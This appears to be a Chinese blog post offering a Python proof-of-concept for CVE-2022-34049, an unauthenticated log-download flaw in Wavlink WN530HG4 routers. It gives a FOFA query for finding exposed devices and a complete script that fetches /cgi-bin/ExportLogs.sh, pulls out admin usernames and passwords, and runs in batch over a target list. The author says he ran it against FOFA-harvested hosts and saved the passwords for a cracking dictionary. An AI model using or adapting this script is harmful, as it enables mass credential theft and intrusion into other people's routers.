学python得永生,python大法好之利用python编写CVE-2022-34049 poc
漏洞说明
Wavlink WN530HG4 M30HG4.V5030.191116中存在访问控制问题,未经验证的攻击者可以下载日志文件和配置数据。
影响版本
Wavlink WN530HG4 M30HG4.V5030.191116
漏洞复现fofa:title="Wi-Fi APP Login"payload:/cgi-bin/ExportLogs.sh
POC
#!/usr/bin/env python
# -*- conding:utf-8 -*-
import requests
import argparse
import sys
import re
import urllib3
urllib3.disable_warnings()
def title():
print("""
_____ __ __ ______ ___ ___ ___ ___ ____ _ _ ___ _ _ ___
/ ____|\ \ / /| ____| |__ \ / _ \ |__ \ |__ \ |___ \ | || | / _ \ | || | / _ \
| | \ \ / / | |__ ______ ) || | | | ) | ) | ______ __) || || |_ | | | || || |_ | (_) |
| | \ \/ / | __| |______| / / | | | | / / / / |______| |__ < |__ _|| | | ||__ _| \__, |
| |____ \ / | |____ / /_ | |_| | / /_ / /_ ___) | | | | |_| | | | / /
\_____| \/ |______| |____| \___/ |____||____| |____/ |_| \___/ |_| /_/
Author:Henry4E36
""")
class information(object):
def __init__(self,args):
self.args = args
self.url = args.url
self.file = args.file
def target_url(self):
target_url = self.url + "/cgi-bin/ExportLogs.sh"
headers = {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:87.0) Gecko/20100101 Firefox/87.0",
}
try:
res = requests.get(url=target_url, headers=headers, verify=False, timeout=5)
if res.status_code == 200 and "Login" in res.text and "Password" in res.text:
print(f"\033[31m[{chr(8730)}] 目标系统: {self.url} 存在Wavlink 导出日志配置未授权访问下载漏洞\033[0m")
pattern1 = re.compile(r"Login=(.*)")
pattern2 = re.compile(r"Password=(.*)")
username = pattern1.findall(res.text)[0]
password = pattern2.findall(res.text)[0]
print(f"\033[31m[{chr(8730)}] 用户名: {username} 密码:{password}\033[0m")
print("[" + "-"*100 + "]")
else:
print(f"[\033[31mx\033[0m] 目标系统: {self.url} 不存在Wavlink 导出日志配置未授权访问下载漏洞")
print("[" + "-"*100 + "]")
except Exception as e:
print("[\033[31mX\033[0m] 连接错误!")
print("[" + "-"*100 + "]")
def file_url(self):
with open(self.file, "r") as urls:
for url in urls:
url = url.strip()
if url[:4] != "http":
url = "http://" + url
self.url = url.strip()
information.target_url(self)
if __name__ == "__main__":
title()
parser = ar=argparse.ArgumentParser(description=' Wavlink 导出日志配置未授权访问下载')
parser.add_argument("-u", "--url", type=str, metavar="url", help="Target url eg:\"http://127.0.0.1\"")
parser.add_argument("-f", "--file", metavar="file", help="Targets in file eg:\"ip.txt\"")
args = parser.parse_args()
if len(sys.argv) != 3:
print(
"[-] 参数错误!\neg1:>>>python3 CVE-2022-34049.py -u http://127.0.0.1\neg2:>>>python3 CVE-2022-34049.py -f ip.txt")
elif args.url:
information(args).target_url()
elif args.file:
information(args).file_url()
利用fofa搜集的数据,批量跑了一下数据,把password字段收集下来,可以补充到字典里去。